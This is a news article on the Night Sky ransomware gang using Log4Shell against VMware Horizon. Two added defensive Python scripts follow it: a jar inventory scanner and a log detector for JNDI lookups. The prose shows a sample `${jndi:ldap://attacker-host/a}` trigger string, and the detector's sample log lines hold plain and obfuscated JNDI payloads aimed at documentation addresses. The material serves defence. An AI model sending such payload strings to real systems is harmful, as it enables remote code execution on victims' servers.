The Night Sky ransomware gang has started exploiting the critical vulnerability CVE-2021-44228 in the Log4j logging library, also known as Log4Shell, to gain access to VMware Horizon systems.
The threat actor targets vulnerable machines exposed on the public web from domains masquerading as legitimate businesses, some of them in the tech and cybersecurity industries.
The attacks began in early January
Spotted at the end of December 2021 by security researcher MalwareHunterTeam, the Night Sky ransomware focuses on locking down corporate networks. The gang has encrypted several victims, demanding a ransom of $800,000 from one of them.
On Monday, Microsoft posted a warning about a new campaign by a China-based actor it tracks as DEV-0401, which exploits the Log4Shell vulnerability on internet-exposed VMware Horizon systems to deploy the Night Sky ransomware.
VMware Horizon is used for the virtualization of desktops and applications in the cloud, allowing users to access them remotely through a dedicated client or a web browser.
It also gives administrators centralized management, security compliance and automation across the entire fleet of virtual systems.
VMware fixed Log4Shell in its Horizon products and provided workarounds for customers who were unable to install the patched versions (2111, 7.13.1, 7.10.3). However, some organizations have yet to apply the fix.
Microsoft adds that the group is known to have deployed other ransomware families in the past, such as LockFile, AtomSilo, and Rook.
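Applying the vendor patch or workaround is only half the job; an administrator also wants to verify, on disk, which log4j-core jars are still present and whether they still carry the JndiLookup class that Log4Shell relies on. The script below is an added example written for this page, not VMware's or Microsoft's tooling and not from the original article. It assumes the jar's version can be read from the Maven pom.properties that real log4j-core jars ship under META-INF/maven/org.apache.logging.log4j/log4j-core/, and it builds three fake jars in a temporary directory (constructed here, containing no real Log4j code) so it can run offline.

```python
"""Find Log4j 2 core jars on disk and report whether each one is still
exploitable through CVE-2021-44228 (Log4Shell).

Added example: reads the version from the jar's Maven pom.properties and
checks whether the JndiLookup class the exploit depends on is still packaged.
The sample jars built by build_sample_tree() are constructed for this example.
"""
import os
import tempfile
import zipfile

POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
FIXED_IN = (2, 15, 0)  # 2.15.0 was the first release addressing CVE-2021-44228


def parse_version(pom_text):
    """Pull 'version=...' out of pom.properties; None if absent."""
    for line in pom_text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def version_tuple(version):
    """'2.14.1' -> (2, 14, 1); a non-numeric piece such as '0-beta9' counts as 0."""
    parts = []
    for piece in version.split("."):
        num = ""
        for ch in piece:
            if not ch.isdigit():
                break
            num += ch
        parts.append(int(num) if num else 0)
    return tuple(parts)


def assess_jar(path):
    """Describe one archive, or return None if it is not a log4j-core jar."""
    with zipfile.ZipFile(path) as jar:
        names = set(jar.namelist())
        if POM_PROPS not in names:
            return None
        version = parse_version(jar.read(POM_PROPS).decode("utf-8", "replace"))
        jndi_present = JNDI_CLASS in names
    # Versions below 2.15.0 are affected. Deleting JndiLookup.class from the
    # jar is the mitigation Apache documented for deployments that cannot
    # upgrade, so an affected version without that class is not exploitable.
    affected = version is not None and version_tuple(version) < FIXED_IN
    return {
        "path": path,
        "version": version,
        "jndi_lookup_present": jndi_present,
        "exploitable": affected and jndi_present,
    }


def scan_tree(root):
    """Walk a directory tree and assess every .jar/.war/.ear found, sorted by path."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith((".jar", ".war", ".ear")):
                continue
            try:
                result = assess_jar(os.path.join(dirpath, name))
            except zipfile.BadZipFile:
                continue  # not a real archive; skip it
            if result:
                findings.append(result)
    return sorted(findings, key=lambda f: f["path"])


def build_sample_tree():
    """Construct three fake log4j-core jars (no real Log4j code) in a temp dir."""
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    samples = [
        ("app1/lib/log4j-core-2.14.1.jar", "2.14.1", True),   # unpatched
        ("app2/lib/log4j-core-2.14.1.jar", "2.14.1", False),  # class removed
        ("app3/lib/log4j-core-2.17.0.jar", "2.17.0", True),   # upgraded
    ]
    for rel, version, keep_class in samples:
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with zipfile.ZipFile(path, "w") as jar:
            jar.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
            if keep_class:
                jar.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes
    return root


if __name__ == "__main__":
    for finding in scan_tree(build_sample_tree()):
        status = "EXPLOITABLE" if finding["exploitable"] else "ok"
        print(f"{status:12} {finding['version']:8} {finding['path']}")
```

Point the scanner at the Horizon install directory (or any application server) instead of the sample tree to get a real inventory. Note that the Maven metadata check only recognises jars that still carry pom.properties; shaded or repackaged jars need a class-level search, and a jar nested inside a .war is only found if the outer archive is unpacked first.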
Previous attacks by this actor have also exploited vulnerabilities in internet-facing systems such as Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473, ProxyShell). Night Sky is believed to be a continuation of the aforementioned ransomware operations.
Microsoft notes that Night Sky ransomware operators rely on command and control servers whose domains masquerade as those of legitimate companies, such as the cybersecurity companies Sophos and Trend Micro and the tech companies Nvidia and Rogers Corporation.
Attractive attack vector
Log4Shell is an attractive attack vector for hackers and cybercriminals because the open source Log4j component is present in a wide range of products from dozens of vendors.
Exploiting the bug to achieve unauthenticated code execution requires minimal effort. An attacker only needs to get a specially crafted string (a JNDI lookup such as `${jndi:ldap://attacker-host/a}`) into any field the application logs, for example by visiting a page with it in the User-Agent header or submitting it in a search box, to make the server call back to an attacker-controlled location and load code from it.
The vulnerability can be exploited remotely against machines exposed on the public internet, or from the local network by an adversary who already has a foothold, to move laterally to sensitive internal systems.
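Because the trigger is just a logged string, the corresponding detection is a search for JNDI lookups in whatever gets logged, with the obfuscations attackers use (nested `${lower:j}`, `${::-j}` default-value tricks, URL encoding) stripped first. The script below is an added example written for this page, not Microsoft's detection logic and not from the original article. The access-log lines are constructed for the example and the callback hosts in them are RFC 5737 documentation addresses, not real attacker infrastructure.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web access logs.

Added example. It first undoes the common obfuscations (URL encoding, ${lower:x}
and ${upper:x} wrappers, ${...:-x} default-value lookups), then searches the
normalized line for a JNDI lookup and extracts the callback host.
The LOG_LINES below are constructed for this example.
"""
import re
import urllib.parse

# ${::-j}, ${env:NOPE:-j}, ${x:-j}: resolve to the default value after ':-'.
# The lookahead keeps the jndi lookup itself from being collapsed.
DEFAULT_RE = re.compile(r"\$\{(?!\s*jndi\s*:)[^{}]*?:-([^{}]*)\}", re.IGNORECASE)
# ${lower:J} / ${upper:j}: resolve to the inner text in the requested case.
CASE_RE = re.compile(r"\$\{\s*(lower|upper)\s*:([^{}]*)\}", re.IGNORECASE)
# A JNDI lookup using one of the protocols Log4j's JndiLookup will resolve.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:", re.IGNORECASE)
# Scheme and host:port of the callback target.
CALLBACK_RE = re.compile(r"jndi\s*:\s*(\w+)\s*:/*([^/\s}]+)", re.IGNORECASE)

LOG_LINES = [  # constructed sample data (Apache combined log format)
    '203.0.113.7 - - [10/Jan/2022:03:14:22 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jan/2022:03:14:23 +0000] "GET /portal/info.jsp HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.23:1389/Exploit}"',
    '203.0.113.7 - - [10/Jan/2022:03:14:24 +0000] "GET /portal/info.jsp?x=${${lower:j}ndi:${lower:l}dap://198.51.100.23:1389/a} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '203.0.113.8 - - [10/Jan/2022:03:15:01 +0000] "GET /login?u=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3Armi%3A%2F%2F198.51.100.23%3A1099%2Fx%7D HTTP/1.1" 400 0 "-" "-"',
    '203.0.113.9 - - [10/Jan/2022:03:16:40 +0000] "GET /static/app.js HTTP/1.1" 200 9981 "-" "Mozilla/5.0"',
]


def normalize(text, max_rounds=10):
    """Strip URL encoding and lookup-based obfuscation, innermost first, until stable."""
    for _ in range(max_rounds):
        previous = text
        text = urllib.parse.unquote(text)
        text = DEFAULT_RE.sub(lambda m: m.group(1), text)
        text = CASE_RE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        if text == previous:
            break
    return text


def scan_line(line):
    """Return a finding dict for a line carrying a JNDI lookup, else None."""
    normalized = normalize(line)
    if not JNDI_RE.search(normalized):
        return None
    target = CALLBACK_RE.search(normalized)
    return {
        "scheme": target.group(1).lower() if target else None,
        "callback": target.group(2) if target else None,
        # True when the lookup was only visible after de-obfuscation.
        "obfuscated": "${jndi:" not in line.lower(),
        "normalized": normalized,
    }


def scan_lines(lines):
    """Return [(line_index, finding)] for every line that carries a JNDI lookup."""
    hits = []
    for index, line in enumerate(lines):
        finding = scan_line(line)
        if finding:
            hits.append((index, finding))
    return hits


if __name__ == "__main__":
    for index, finding in scan_lines(LOG_LINES):
        flag = "obfuscated" if finding["obfuscated"] else "plain"
        print(f"line {index}: {flag:10} {finding['scheme']}://{finding['callback']}")
```

Run it against a real access log with `scan_lines(open(path).read().splitlines())`. Two caveats a practitioner should keep in mind: the payload can arrive in any field the application logs (User-Agent, X-Forwarded-For, a username, a Horizon login form), so a web-server access log only captures attempts that travel in the URL or in a header the server itself records; and the normalization covers the well-known obfuscation patterns, not every variant, so a hit is high confidence while a miss is not proof of absence.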
One of the first high-profile ransomware gangs to integrate Log4Shell into their attacks was Conti, which expressed interest in it as a potential attack route on December 12, just three days after the first proof-of-concept (PoC) exploit became public.
Another ransomware gang, a newcomer called Khonsari, began exploiting the vulnerability the day after the PoC appeared on GitHub.
In the days following its disclosure, several threat actors began exploiting the Log4j bug. The first to take advantage were cryptocurrency miners, followed by state-backed hackers and ransomware gangs.